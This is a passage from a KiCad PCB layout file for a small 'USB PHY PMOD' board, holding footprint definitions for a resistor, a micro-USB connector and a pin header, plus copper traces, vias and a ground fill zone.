0.12)) (fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12)) (fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05)) (fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05)) (fp_text user %R (at 0 0) (layer F.Fab) (effects (font (size 0.5 0.5) (thickness 0.08))) ) (pad 1 smd roundrect (at -1.025 0) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391) (net 1 GND)) (pad 2 smd roundrect (at 1.025 0) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391) (net 16 /SUS)) (model ${KISYS3DMOD}/Resistor_SMD.3dshapes/R_0805_2012Metric.wrl (at (xyz 0 0 0)) (scale (xyz 1 1 1)) (rotate (xyz 0 0 0)) ) ) (module digikey-footprints:USB_Micro_B_Female_10118193-0001LF (layer F.Cu) (tedit 5BD21A05) (tstamp 5C92B401) (at 81.44489 52.07 270) (descr http://portal.fciconnect.com/Comergent//fci/drawing/10118193.pdf) (path /5C8252B6) (fp_text reference J1 (at 5.08 0.16489) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 10118193-0001LF (at 0 4.5 270) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start 4.014908 2.461848) (end 4.014908 2.841848) (layer F.SilkS) (width 0.1)) (fp_line (start 4.014908 2.841848) (end 3.644908 2.841848) (layer F.SilkS) (width 0.1)) (fp_line (start -4.013324 2.84) (end -3.643324 2.84) (layer F.SilkS) (width 0.1)) (fp_line (start -4.013324 2.46) (end -4.013324 2.84) (layer F.SilkS) (width 0.1)) (fp_line (start 4.06 -3.22) (end 4.06 -1.75) (layer F.SilkS) (width 0.1)) (fp_line (start 4.06 -3.22) (end 2.4 -3.22) (layer F.SilkS) (width 0.1)) (fp_line (start -4.05 -3.21) (end -2.4 -3.21) (layer F.SilkS) (width 0.1)) (fp_line (start -4.05 -3.2) (end -4.05 -1.75) (layer F.SilkS) (width 0.1)) (fp_line (start 3.93 2.75) (end 3.93 -2.9) (layer F.Fab) (width 0.1)) (fp_line (start -3.93 2.75) (end 3.93 2.75) (layer F.Fab) (width 0.1)) (fp_line (start -3.93 -2.34) (end -3.37 -2.9) (layer F.Fab) (width 0.1)) (fp_line (start 3.93 -2.9) (end -3.37 -2.9) (layer F.Fab) (width 0.1)) (fp_line (start -3.93 2.75) (end -3.93 -2.34) (layer F.Fab) (width 0.1)) (fp_line (start 4.25 -3.75) (end 4.25 3) (layer F.CrtYd) (width 0.05)) (fp_line (start -4.25 -3.75) (end 4.25 -3.75) (layer F.CrtYd) (width 0.05)) (fp_line (start -4.25 3) (end 4.25 3) (layer F.CrtYd) (width 0.05)) (fp_line (start -4.25 -3.75) (end -4.25 3) (layer F.CrtYd) (width 0.05)) (fp_text user %R (at 0.06 1.86 270) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (pad SH smd rect (at 1.2 0 270) (size 1.9 1.9) (layers F.Cu F.Paste F.Mask) (net 1 GND)) (pad SH smd rect (at -1.2 0 270) (size 1.9 1.9) (layers F.Cu F.Paste F.Mask) (net 1 GND)) (pad SH smd rect (at 3.2 -2.45 270) (size 1.6 1.4) (layers F.Cu F.Paste F.Mask) (net 1 GND)) (pad SH smd rect (at -3.2 -2.45 270) (size 1.6 1.4) (layers F.Cu F.Paste F.Mask) (net 1 GND)) (pad SH thru_hole oval (at -3.3 0 270) (size 0.9 1.6) (drill oval 0.5 1.2) (layers *.Cu *.Mask) (net 1 GND)) (pad SH thru_hole oval (at 3.3 0 270) (size 0.9 1.6) (drill oval 0.5 1.2) (layers *.Cu *.Mask) (net 1 GND)) (pad 1 smd rect (at -1.3 -2.675 270) (size 0.4 1.35) (layers F.Cu F.Paste F.Mask) (net 7 /PP5000_VBUS)) (pad 2 smd rect (at -0.65 -2.675 270) (size 0.4 1.35) (layers F.Cu F.Paste F.Mask) (net 2 /DN1)) (pad 5 smd rect (at 1.3 -2.675 270) (size 0.4 1.35) (layers F.Cu F.Paste F.Mask) (net 1 GND)) (pad 4 smd rect (at 0.65 -2.675 270) (size 0.4 1.35) (layers F.Cu F.Paste F.Mask)) (pad 3 smd rect (at 0 -2.675 270) (size 0.4 1.35) (layers F.Cu F.Paste F.Mask) (net 5 /DP1)) ) (module digikey-footprints:PinHeader_6x2_P2.54mm_Horizontal (layer F.Cu) (tedit 5B18017E) (tstamp 5C92B444) (at 104.14 52.07) (descr http://portal.fciconnect.com/Comergent//fci/drawing/68020.pdf) (path /5C7E600E) (fp_text reference J3 (at 1.27 -2.54) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value 68021-412HLF (at 1.6 15.8) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start -1.4 -1.05) (end -1.04 -1.41) (layer F.SilkS) (width 0.1)) (fp_line (start -1.27 -1) (end -1 -1.27) (layer F.Fab) (width 0.1)) (fp_line (start -1.52 -1.52) (end 4.06 -1.52) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.52 14.22) (end 4.06 14.22) (layer F.CrtYd) (width 0.05)) (fp_line (start -1.52 14.22) (end -1.52 -1.52) (layer F.CrtYd) (width 0.05)) (fp_line (start 4.06 14.22) (end 4.06 -1.52) (layer F.CrtYd) (width 0.05)) (fp_line (start 3.9 14.1) (end 3.9 13.7) (layer F.SilkS) (width 0.1)) (fp_line (start 3.9 14.1) (end 3.5 14.1) (layer F.SilkS) (width 0.1)) (fp_line (start -1.4 14.1) (end -1 14.1) (layer F.SilkS) (width 0.1)) (fp_line (start -1.4 14.1) (end -1.4 13.7) (layer F.SilkS) (width 0.1)) (fp_line (start -1.4 -1.05) (end -1.4 -0.6) (layer F.SilkS) (width 0.1)) (fp_line (start -1.04 -1.41) (end -0.61 -1.41) (layer F.SilkS) (width 0.1)) (fp_line (start 3.9 -1.4) (end 3.9 -1) (layer F.SilkS) (width 0.1)) (fp_line (start 3.9 -1.4) (end 3.5 -1.4) (layer F.SilkS) (width 0.1)) (fp_line (start 3.81 -1.27) (end 3.81 13.97) (layer F.Fab) (width 0.1)) (fp_line (start -1.27 -1) (end -1.27 13.97) (layer F.Fab) (width 0.1)) (fp_line (start -1.27 13.97) (end 3.81 13.97) (layer F.Fab) (width 0.1)) (fp_line (start -1 -1.27) (end 3.81 -1.27) (layer F.Fab) (width 0.1)) (pad 1 thru_hole circle (at 0 0) (size 2 2) (drill 1.02) (layers *.Cu *.Mask) (net 9 PP3300)) (pad 3 thru_hole circle (at 0 2.54) (size 2 2) (drill 1.02) (layers *.Cu *.Mask) (net 1 GND)) (pad 5 thru_hole circle (at 0 5.08) (size 2 2) (drill 1.02) (layers *.Cu *.Mask) (net 12 /DN_RX)) (pad 7 thru_hole circle (at 0 7.62) (size 2 2) (drill 1.02) (layers *.Cu *.Mask) (net 11 /DP_RX)) (pad 9 thru_hole circle (at 0 10.16) (size 2 2) (drill 1.02) (layers *.Cu *.Mask) (net 17 /DM_TX)) (pad 11 thru_hole circle (at 0 12.7) (size 2 2) (drill 1.02) (layers *.Cu *.Mask) (net 18 /DP_TX)) (pad 12 thru_hole circle (at 2.54 12.7) (size 2 2) (drill 1.02) (layers *.Cu *.Mask) (net 10 /PULLUPDP)) (pad 10 thru_hole circle (at 2.54 10.16) (size 2 2) (drill 1.02) (layers *.Cu *.Mask) (net 6 /SENSE1)) (pad 8 thru_hole circle (at 2.54 7.62) (size 2 2) (drill 1.02) (layers *.Cu *.Mask) (net 15 /USB_OE_L)) (pad 6 thru_hole circle (at 2.54 5.08) (size 2 2) (drill 1.02) (layers *.Cu *.Mask) (net 13 /D_RX)) (pad 4 thru_hole circle (at 2.54 2.54) (size 2 2) (drill 1.02) (layers *.Cu *.Mask) (net 1 GND)) (pad 2 thru_hole circle (at 2.54 0) (size 2 2) (drill 1.02) (layers *.Cu *.Mask) (net 9 PP3300)) ) (gr_line (start 109.22 46.99) (end 110.49 46.99) (layer Edge.Cuts) (width 0.15) (tstamp 5F56E6A7)) (gr_text "USB PHY PMOD" (at 100.965 68.072) (layer F.SilkS) (effects (font (size 1.5 1.5) (thickness 0.3))) ) (gr_line (start 78.74 69.85) (end 78.74 46.99) (layer Edge.Cuts) (width 0.15)) (gr_line (start 110.49 69.85) (end 78.74 69.85) (layer Edge.Cuts) (width 0.15)) (gr_line (start 110.49 46.99) (end 110.49 69.85) (layer Edge.Cuts) (width 0.15)) (gr_line (start 78.74 46.99) (end 109.22 46.99) (layer Edge.Cuts) (width 0.15)) (segment (start 104.14 54.61) (end 106.68 54.61) (width 0.25) (layer B.Cu) (net 1) (status 30)) (segment (start 81.54489 48.87) (end 81.44489 48.77) (width 0.25) (layer F.Cu) (net 1) (status 30)) (segment (start 83.89489 48.87) (end 81.54489 48.87) (width 0.25) (layer F.Cu) (net 1) (status 30)) (segment (start 81.99489 50.87) (end 81.44489 50.87) (width 0.25) (layer F.Cu) (net 1) (status 30)) (segment (start 83.89489 48.97) (end 81.99489 50.87) (width 0.25) (layer F.Cu) (net 1) (status 30)) (segment (start 83.89489 48.87) (end 83.89489 48.97) (width 0.25) (layer F.Cu) (net 1) (status 30)) (segment (start 81.44489 50.87) (end 81.44489 53.27) (width 0.25) (layer F.Cu) (net 1) (status 30)) (segment (start 82.24489 55.27) (end 83.89489 55.27) (width 0.25) (layer F.Cu) (net 1) (status 20)) (segment (start 81.44489 54.47) (end 82.24489 55.27) (width 0.25) (layer F.Cu) (net 1)) (segment (start 81.44489 53.27) (end 81.44489 54.47) (width 0.25) (layer F.Cu) (net 1) (status 10)) (segment (start 81.44489 53.27) (end 81.44489 55.37) (width 0.25) (layer F.Cu) (net 1) (status 30)) (segment (start 81.54489 55.27) (end 81.44489 55.37) (width 0.25) (layer F.Cu) (net 1) (status 30)) (segment (start 83.89489 55.27) (end 81.54489 55.27) (width 0.25) (layer F.Cu) (net 1) (status 30)) (segment (start 81.44489 48.77) (end 81.44489 50.87) (width 0.25) (layer F.Cu) (net 1) (status 30)) (via (at 80.01 50.8) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 1)) (segment (start 81.44489 50.87) (end 80.08 50.87) (width 0.25) (layer F.Cu) (net 1) (status 10)) (segment (start 80.08 50.87) (end 80.01 50.8) (width 0.25) (layer F.Cu) (net 1)) (via (at 80.01 53.34) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 1)) (segment (start 81.44489 53.27) (end 80.08 53.27) (width 0.25) (layer F.Cu) (net 1) (status 10)) (segment (start 80.08 53.27) (end 80.01 53.34) (width 0.25) (layer F.Cu) (net 1)) (via (at 83.82 57.15) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 1)) (segment (start 83.89489 55.27) (end 83.89489 57.07511) (width 0.25) (layer F.Cu) (net 1) (status 10)) (segment (start 83.89489 57.07511) (end 83.82 57.15) (width 0.25) (layer F.Cu) (net 1)) (segment (start 84.11989 55.045) (end 83.89489 55.27) (width 0.25) (layer F.Cu) (net 1) (status 30)) (segment (start 84.11989 53.37) (end 84.11989 55.045) (width 0.25) (layer F.Cu) (net 1) (status 30)) (via (at 85.09 54.61) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 1)) (segment (start 84.11989 53.37) (end 84.11989 53.63989) (width 0.25) (layer F.Cu) (net 1) (status 10)) (segment (start 84.11989 53.63989) (end 85.09 54.61) (width 0.25) (layer F.Cu) (net 1)) (segment (start 99.3394 54.6444) (end 99.305 54.61) (width 0.25) (layer F.Cu) (net 1)) (segment (start 99.3394 56.145001) (end 99.3394 54.6444) (width 0.25) (layer F.Cu) (net 1) (status 10)) (segment (start 99.305 52.95) (end 99.06 52.705) (width 0.25) (layer F.Cu) (net 1) (status 30)) (segment (start 99.305 54.61) (end 99.305 52.95) (width 0.25) (layer F.Cu) (net 1) (status 20)) (via (at 95.631 53.086) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 1)) (segment (start 93.105 62.23) (end 93.105 62.385) (width 0.25) (layer F.Cu) (net 1) (status 30)) (via (at 97.155 64.135) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 1)) (via (at 98.425 49.53) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 1)) (segment (start 97.645 50.31) (end 98.425 49.53) (width 0.25) (layer F.Cu) (net 1)) (segment (start 96.52 50.31) (end 97.645 50.31) (width 0.25) (layer F.Cu) (net 1) (status 10)) (via (at 85.725 48.895) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 1)) (segment (start 85.7 48.87) (end 85.725 48.895) (width 0.25) (layer F.Cu) (net 1)) (segment (start 83.89489 48.87) (end 85.7 48.87) (width 0.25) (layer F.Cu) (net 1) (status 10)) (via (at 100.33 50.8) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 1)) (segment (start 99.305 51.825) (end 100.33 50.8) (width 0.25) (layer F.Cu) (net 1)) (segment (start 99.305 53.34) (end 99.305 51.825) (width 0.25) (layer F.Cu) (net 1) (status 10)) (segment (start 93.59 63.355) (end 95.64 65.405) (width 0.25) (layer F.Cu) (net 1) (status 30)) (segment (start 93.59 62.865) (end 93.59 63.355) (width 0.25) (layer F.Cu) (net 1) (status 30)) (segment (start 95.885 65.405) (end 97.155 64.135) (width 0.25) (layer F.Cu) (net 1) (status 10)) (segment (start 95.64 65.405) (end 95.885 65.405) (width 0.25) (layer F.Cu) (net 1) (status 30)) (segment (start 94.92 52.465) (end 93.98 52.465) (width 0.25) (layer F.Cu) (net 1) (status 20)) (segment (start 95.885 53.34) (end 95.795 53.34) (width 0.25) (layer F.Cu) (net 1)) (segment (start 95.541 53.086) (end 94.92 52.465) (width 0.25) (layer F.Cu) (net 1)) (segment (start 95.631 53.086) (end 95.541 53.086) (width 0.25) (layer F.Cu) (net 1)) (segment (start 84.11989 51.42) (end 85.71 51.42) (width 0.25) (layer F.Cu) (net 2) (status 10)) (segment (start 86.33 50.8) (end 87.24 50.8) (width 0.25) (layer F.Cu) (net 2) (status 20)) (segment (start 85.71 51.42) (end 86.33 50.8) (width 0.25) (layer F.Cu) (net 2)) (segment (start 91.735001 57.445001) (end 93.7006 57.445001) (width 0.25) (layer F.Cu) (net 3) (status 20)) (segment (start 89.29 51.68) (end 89.925 52.315) (width 0.25) (layer F.Cu) (net 3)) (segment (start 89.29 50.8) (end 89.29 51.68) (width 0.25) (layer F.Cu) (net 3) (status 10)) (segment (start 89.925 52.315) (end 89.925 55.635) (width 0.25) (layer F.Cu) (net 3)) (segment (start 89.925 55.635) (end 91.735001 57.445001) (width 0.25) (layer F.Cu) (net 3)) (segment (start 91.114999 58.094999) (end 88.9 55.88) (width 0.25) (layer F.Cu) (net 4)) (segment (start 93.7006 58.094999) (end 91.114999 58.094999) (width 0.25) (layer F.Cu) (net 4) (status 10)) (segment (start 88.9 53.585) (end 88.655 53.34) (width 0.25) (layer F.Cu) (net 4) (status 30)) (segment (start 88.9 55.88) (end 88.9 53.585) (width 0.25) (layer F.Cu) (net 4) (status 20)) (segment (start 86.31489 53.34) (end 86.605 53.34) (width 0.25) (layer F.Cu) (net 5) (status 30)) (segment (start 85.04489 52.07) (end 86.31489 53.34) (width 0.25) (layer F.Cu) (net 5) (status 20)) (segment (start 84.11989 52.07) (end 85.04489 52.07) (width 0.25) (layer F.Cu) (net 5) (status 10)) (segment (start 86.605 58.42) (end 86.605 53.34) (width 0.25) (layer F.Cu) (net 5) (status 30)) (segment (start 92.71 48.26) (end 96.52 48.26) (width 0.25) (layer F.Cu) (net 6) (status 30)) (segment (start 96.52 48.26) (end 107.95 48.26) (width 0.25) (layer F.Cu) (net 6) (status 10)) (segment (start 109.670009 49.980009) (end 109.670009 60.509991) (width 0.25) (layer F.Cu) (net 6)) (segment (start 107.95 48.26) (end 109.670009 49.980009) (width 0.25) (layer F.Cu) (net 6)) (segment (start 107.95 62.23) (end 106.68 62.23) (width 0.25) (layer F.Cu) (net 6) (status 20)) (segment (start 109.670009 60.509991) (end 107.95 62.23) (width 0.25) (layer F.Cu) (net 6)) (segment (start 93.7006 60.694999) (end 94.7888 60.694999) (width 0.25) (layer F.Cu) (net 7) (status 10)) (segment (start 95.64 61.546199) (end 94.7888 60.694999) (width 0.25) (layer F.Cu) (net 7)) (segment (start 84.11989 50.77) (end 85.1149 49.77499) (width 0.25) (layer F.Cu) (net 7) (status 10)) (segment (start 85.1149 49.77499) (end 86.11501 49.77499) (width 0.25) (layer F.Cu) (net 7)) (segment (start 90.17 47.77) (end 92.71 50.31) (width 0.25) (layer F.Cu) (net 7) (status 20)) (segment (start 88.12 47.77) (end 86.11501 49.77499) (width 0.25) (layer F.Cu) (net 7)) (segment (start 90.17 47.77) (end 88.12 47.77) (width 0.25) (layer F.Cu) (net 7)) (segment (start 95.64 62.865) (end 95.64 61.546199) (width 0.25) (layer F.Cu) (net 7) (status 10)) (segment (start 95.261001 60.694999) (end 93.7006 60.694999) (width 0.25) (layer F.Cu) (net 7) (status 20)) (segment (start 96.610001 59.345999) (end 95.261001 60.694999) (width 0.25) (layer F.Cu) (net 7)) (segment (start 96.610001 52.106999) (end 96.610001 59.345999) (width 0.25) (layer F.Cu) (net 7)) (segment (start 92.71 50.31) (end 94.252 50.31) (width 0.25) (layer F.Cu) (net 7) (status 10)) (segment (start 94.252 50.31) (end 95.504 51.562) (width 0.25) (layer F.Cu) (net 7)) (segment (start 95.504 51.562) (end 96.065002 51.562) (width 0.25) (layer F.Cu) (net 7)) (segment (start 96.065002 51.562) (end 96.610001 52.106999) (width 0.25) (layer F.Cu) (net 7)) (segment (start 92.355002 60.044998) (end 93.7006 60.044998) (width 0.25) (layer F.Cu) (net 8) (status 20)) (segment (start 92.075 60.325) (end 92.355002 60.044998) (width 0.25) (layer F.Cu) (net 8)) (segment (start 93.59 65.405) (end 92.71 65.405) (width 0.25) (layer F.Cu) (net 8) (status 10)) (segment (start 92.075 64.77) (end 92.075 60.325) (width 0.25) (layer F.Cu) (net 8)) (segment (start 92.71 65.405) (end 92.075 64.77) (width 0.25) (layer F.Cu) (net 8)) (segment (start 103.895 57.395) (end 104.14 57.15) (width 0.25) (layer F.Cu) (net 12) (status 30)) (segment (start 104.14 52.07) (end 106.68 52.07) (width 0.25) (layer F.Cu) (net 9) (status 30)) (segment (start 93.7006 54.4944) (end 93.98 54.215) (width 0.25) (layer F.Cu) (net 9) (status 30)) (segment (start 93.7006 56.145001) (end 93.7006 54.4944) (width 0.25) (layer F.Cu) (net 9) (status 30)) (segment (start 93.34 54.215) (end 91.44 52.315) (width 0.25) (layer F.Cu) (net 9) (status 30)) (segment (start 93.98 54.215) (end 93.34 54.215) (width 0.25) (layer F.Cu) (net 9) (status 30)) (via (at 90.17 48.895) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 9)) (segment (start 102.87 47.625) (end 104.14 48.895) (width 0.25) (layer B.Cu) (net 9)) (segment (start 91.44 47.625) (end 102.87 47.625) (width 0.25) (layer B.Cu) (net 9)) (segment (start 90.17 48.895) (end 91.44 50.165) (width 0.25) (layer F.Cu) (net 9)) (segment (start 91.44 50.165) (end 91.44 52.315) (width 0.25) (layer F.Cu) (net 9) (status 20)) (segment (start 90.17 48.895) (end 91.44 47.625) (width 0.25) (layer B.Cu) (net 9)) (segment (start 104.14 48.895) (end 104.14 52.07) (width 0.25) (layer B.Cu) (net 9) (status 20)) (segment (start 100.685001 60.045001) (end 99.3394 60.045001) (width 0.25) (layer F.Cu) (net 10) (status 20)) (segment (start 106.68 66.04) (end 106.68 64.77) (width 0.25) (layer B.Cu) (net 10) (status 20)) (via (at 101.6 61.595) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 10)) (segment (start 101.6 61.595) (end 100.685001 60.045001) (width 0.25) (layer F.Cu) (net 10)) (segment (start 101.6 65.405) (end 102.87 66.675) (width 0.25) (layer B.Cu) (net 10)) (segment (start 101.6 61.595) (end 101.6 65.405) (width 0.25) (layer B.Cu) (net 10)) (segment (start 106.045 66.675) (end 106.68 66.04) (width 0.25) (layer B.Cu) (net 10)) (segment (start 102.87 66.675) (end 106.045 66.675) (width 0.25) (layer B.Cu) (net 10)) (segment (start 102.545002 58.095002) (end 104.14 59.69) (width 0.25) (layer F.Cu) (net 11) (status 20)) (segment (start 99.3394 58.095002) (end 102.545002 58.095002) (width 0.25) (layer F.Cu) (net 11) (status 10)) (segment (start 103.844999 57.445001) (end 104.14 57.15) (width 0.25) (layer F.Cu) (net 12) (status 30)) (segment (start 99.3394 57.445001) (end 103.844999 57.445001) (width 0.25) (layer F.Cu) (net 12) (status 30)) (segment (start 108.585 51.435) (end 108.585 55.88) (width 0.25) (layer F.Cu) (net 13)) (segment (start 106.68 49.53) (end 108.585 51.435) (width 0.25) (layer F.Cu) (net 13)) (segment (start 108.585 55.88) (end 106.68 57.15) (width 0.25) (layer F.Cu) (net 13) (status 20)) (segment (start 100.33 49.53) (end 106.68 49.53) (width 0.25) (layer F.Cu) (net 13)) (segment (start 99.3394 58.745001) (end 98.2512 58.745001) (width 0.25) (layer F.Cu) (net 13) (status 10)) (segment (start 98.2512 58.745001) (end 97.79 58.283801) (width 0.25) (layer F.Cu) (net 13)) (segment (start 97.79 58.283801) (end 97.79 52.07) (width 0.25) (layer F.Cu) (net 13)) (segment (start 97.79 52.07) (end 100.33 49.53) (width 0.25) (layer F.Cu) (net 13)) (via (at 100.965 66.04) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 14)) (via (at 100.33 62.23) (size 0.8) (drill 0.4) (layers F.Cu B.Cu) (net 14)) (segment (start 100.33 62.23) (end 99.3394 61.2394) (width 0.25) (layer F.Cu) (net 14)) (segment (start 99.3394 61.2394) (end 99.3394 60.694999) (width 0.25) (layer F.Cu) (net 14) (status 20)) (segment (start 100.965 62.865) (end 100.965 66.04) (width 0.25) (layer B.Cu) (net 14)) (segment (start 100.33 62.23) (end 100.965 62.865) (width 0.25) (layer B.Cu) (net 14)) (segment (start 88.655 67.7) (end 88.655 58.42) (width 0.25) (layer F.Cu) (net 14) (status 20)) (segment (start 89.535 68.58) (end 88.655 67.7) (width 0.25) (layer F.Cu) (net 14)) (segment (start 98.425 68.58) (end 89.535 68.58) (width 0.25) (layer F.Cu) (net 14)) (segment (start 100.965 66.04) (end 98.425 68.58) (width 0.25) (layer F.Cu) (net 14)) (segment (start 97.155 58.298799) (end 98.2512 59.394999) (width 0.25) (layer F.Cu) (net 15)) (segment (start 97.155 52.06859) (end 97.155 58.298799) (width 0.25) (layer F.Cu) (net 15)) (segment (start 100.33 48.89359) (end 97.155 52.06859) (width 0.25) (layer F.Cu) (net 15)) (segment (start 109.22 57.15) (end 109.22 51.43359) (width 0.25) (layer F.Cu) (net 15)) (segment (start 109.22 51.43359) (end 106.68 48.89359) (width 0.25) (layer F.Cu) (net 15)) (segment (start 98.2512 59.394999) (end 99.3394 59.394999) (width 0.25) (layer F.Cu) (net 15) (status 20)) (segment (start 106.68 59.69) (end 109.22 57.15) (width 0.25) (layer F.Cu) (net 15) (status 10)) (segment (start 106.68 48.89359) (end 100.33 48.89359) (width 0.25) (layer F.Cu) (net 15)) (segment (start 100.4276 56.795002) (end 101.355 55.867602) (width 0.25) (layer F.Cu) (net 16)) (segment (start 99.3394 56.795002) (end 100.4276 56.795002) (width 0.25) (layer F.Cu) (net 16) (status 10)) (segment (start 101.355 53.34) (end 101.355 55) (width 0.25) (layer F.Cu) (net 16) (status 10)) (segment (start 101.355 55) (end 101.355 54.61) (width 0.25) (layer F.Cu) (net 16)) (segment (start 101.355 55.867602) (end 101.355 55) (width 0.25) (layer F.Cu) (net 16)) (segment (start 102.235 62.23) (end 104.14 62.23) (width 0.25) (layer F.Cu) (net 17) (status 20)) (segment (start 92.075 66.675) (end 97.79 66.675) (width 0.25) (layer F.Cu) (net 17)) (segment (start 93.7006 59.394999) (end 91.735001 59.394999) (width 0.25) (layer F.Cu) (net 17) (status 10)) (segment (start 91.44 66.04) (end 92.075 66.675) (width 0.25) (layer F.Cu) (net 17)) (segment (start 91.735001 59.394999) (end 91.44 59.69) (width 0.25) (layer F.Cu) (net 17)) (segment (start 97.79 66.675) (end 102.235 62.23) (width 0.25) (layer F.Cu) (net 17)) (segment (start 91.44 59.69) (end 91.44 66.04) (width 0.25) (layer F.Cu) (net 17)) (segment (start 92.473799 58.87001) (end 90.62001 58.87001) (width 0.25) (layer F.Cu) (net 18)) (segment (start 92.598811 58.744998) (end 92.473799 58.87001) (width 0.25) (layer F.Cu) (net 18)) (segment (start 93.7006 58.744998) (end 92.598811 58.744998) (width 0.25) (layer F.Cu) (net 18) (status 10)) (segment (start 90.62001 58.87001) (end 90.17 59.32002) (width 0.25) (layer F.Cu) (net 18)) (segment (start 90.17 59.32002) (end 90.17 66.04) (width 0.25) (layer F.Cu) (net 18)) (segment (start 100.33141 64.77) (end 99.06141 66.04) (width 0.25) (layer F.Cu) (net 18)) (segment (start 90.17 66.04) (end 91.44 67.31) (width 0.25) (layer F.Cu) (net 18)) (segment (start 91.44 67.31) (end 97.79141 67.31) (width 0.25) (layer F.Cu) (net 18)) (segment (start 100.33141 64.77) (end 104.14 64.77) (width 0.25) (layer F.Cu) (net 18) (status 20)) (segment (start 97.79141 67.31) (end 100.33141 64.77) (width 0.25) (layer F.Cu) (net 18)) (segment (start 91.44 54.365) (end 91.44 55.88) (width 0.25) (layer F.Cu) (net 19) (status 10)) (segment (start 92.354999 56.794999) (end 93.7006 56.794999) (width 0.25) (layer F.Cu) (net 19) (status 20)) (segment (start 91.44 55.88) (end 92.354999 56.794999) (width 0.25) (layer F.Cu) (net 19)) (zone (net 1) (net_name GND) (layer B.Cu) (tstamp 5F5EC983) (hatch edge 0.508) (connect_pads (clearance 0.508)) (min_thickness 0.254) (fill yes (arc_segments 16) (thermal_gap 0.508) (thermal_bridge_width 0.508)) (polygon (pts (xy 78.74 46.99) (xy 110.49 46.99) (xy 110.49 69.85) (xy 78.74 69.85) ) ) (filled_polygon (pts (xy 80.758657 47.730624) (xy 80.562345 47.816191) (xy 80.386499 47.938413) (xy 80.237876 48.092592) (xy 80.122188 48.272803) (xy 80.050482 48.475999) (xy 80.177388 48.643) (xy 81.31789 48.643) (xy 81.31789 48.623) (xy 81.57189 48.623) (xy 81.57189 48.643) (xy 82.712392 48.643) (xy 82.839298 48.475999) (xy 82.767592 48.272803) (xy 82.651904 48.092592) (xy 82.503281 47.938413) (xy 82.327435 47.816191) (xy 82.131123 47.730624) (xy 81.99068 47.7) (xy 90.290198 47.7) (xy 90.130199 47.86) (xy 90.068061 47.86) (xy 89.868102 47.899774) (xy 89.679744 47.977795) (xy 89.510226 48.091063) (xy 89.366063 48.235226) (xy 89.252795 48.404744) (xy 89.174774 48.593102) (xy 89.135 48.793061) (xy 89.135 48.996939) (xy 89.174774 49.196898) (xy 89.252795 49.385256) (xy 89.366063 49.554774) (xy 89.510226 49.698937) (xy 89.679744 49.812205) (xy 89.868102 49.890226) (xy 90.068061 49.93) (xy 90.271939 49.93) (xy 90.471898 49.890226) (xy 90.660256 49.812205) (xy 90.829774 49.698937) (xy 90.973937 49.554774) (xy 91.087205 49.385256) (xy 91.165226 49.196898) (xy 91.205 48.996939) (xy 91.205 48.934801) (xy 91.754802 48.385) (xy 102.555199 48.385) (xy 103.38 49.209802) (xy 103.380001 50.615091) (xy 103.365537 50.621082) (xy 103.097748 50.800013) (xy 102.870013 51.027748) (xy 102.691082 51.295537) (xy 102.567832 51.593088) (xy 102.505 51.908967) (xy 102.505 52.231033) (xy 102.567832 52.546912) (xy 102.691082 52.844463) (xy 102.870013 53.112252) (xy 103.097748 53.339987) (xy 103.2066 53.41272) (xy 103.184192 53.474587) (xy 104.14 54.430395) (xy 105.095808 53.474587) (xy 105.0734 53.41272) (xy 105.182252 53.339987) (xy 105.409987 53.112252) (xy 105.41 53.112233) (xy 105.410013 53.112252) (xy 105.637748 53.339987) (xy 105.7466 53.41272) (xy 105.724192 53.474587) (xy 106.68 54.430395) (xy 107.635808 53.474587) (xy 107.6134 53.41272) (xy 107.722252 53.339987) (xy 107.949987 53.112252) (xy 108.128918 52.844463) (xy 108.252168 52.546912) (xy 108.315 52.231033) (xy 108.315 51.908967) (xy 108.252168 51.593088) (xy 108.128918 51.295537) (xy 107.949987 51.027748) (xy 107.722252 50.800013) (xy 107.454463 50.621082) (xy 107.156912 50.497832) (xy 106.841033 50.435) (xy 106.518967 50.435) (xy 106.203088 50.497832) (xy 105.905537 50.621082) (xy 105.637748 50.800013) (xy 105.410013 51.027748) (xy 105.41 51.027767) (xy 105.409987 51.027748) (xy 105.182252 50.800013) (xy 104.914463 50.621082) (xy 104.9 50.615091) (xy 104.9 48.932322) (xy 104.903676 48.894999) (xy 104.9 48.857676) (xy 104.9 48.857667) (xy 104.889003 48.746014) (xy 104.845546 48.602753) (xy 104.774974 48.470724) (xy 104.680001 48.354999) (xy 104.651004 48.331202) (xy 104.019801 47.7) (xy 109.78 47.7) (xy 109.780001 69.14) (xy 79.45 69.14) (xy 79.45 62.128061) (xy 99.295 62.128061) (xy 99.295 62.331939) (xy 99.334774 62.531898) (xy 99.412795 62.720256) (xy 99.526063 62.889774) (xy 99.670226 63.033937) (xy 99.839744 63.147205) (xy 100.028102 63.225226) (xy 100.205 63.260413) (xy 100.205001 65.336288) (xy 100.161063 65.380226) (xy 100.047795 65.549744) (xy 99.969774 65.738102) (xy 99.93 65.938061) (xy 99.93 66.141939) 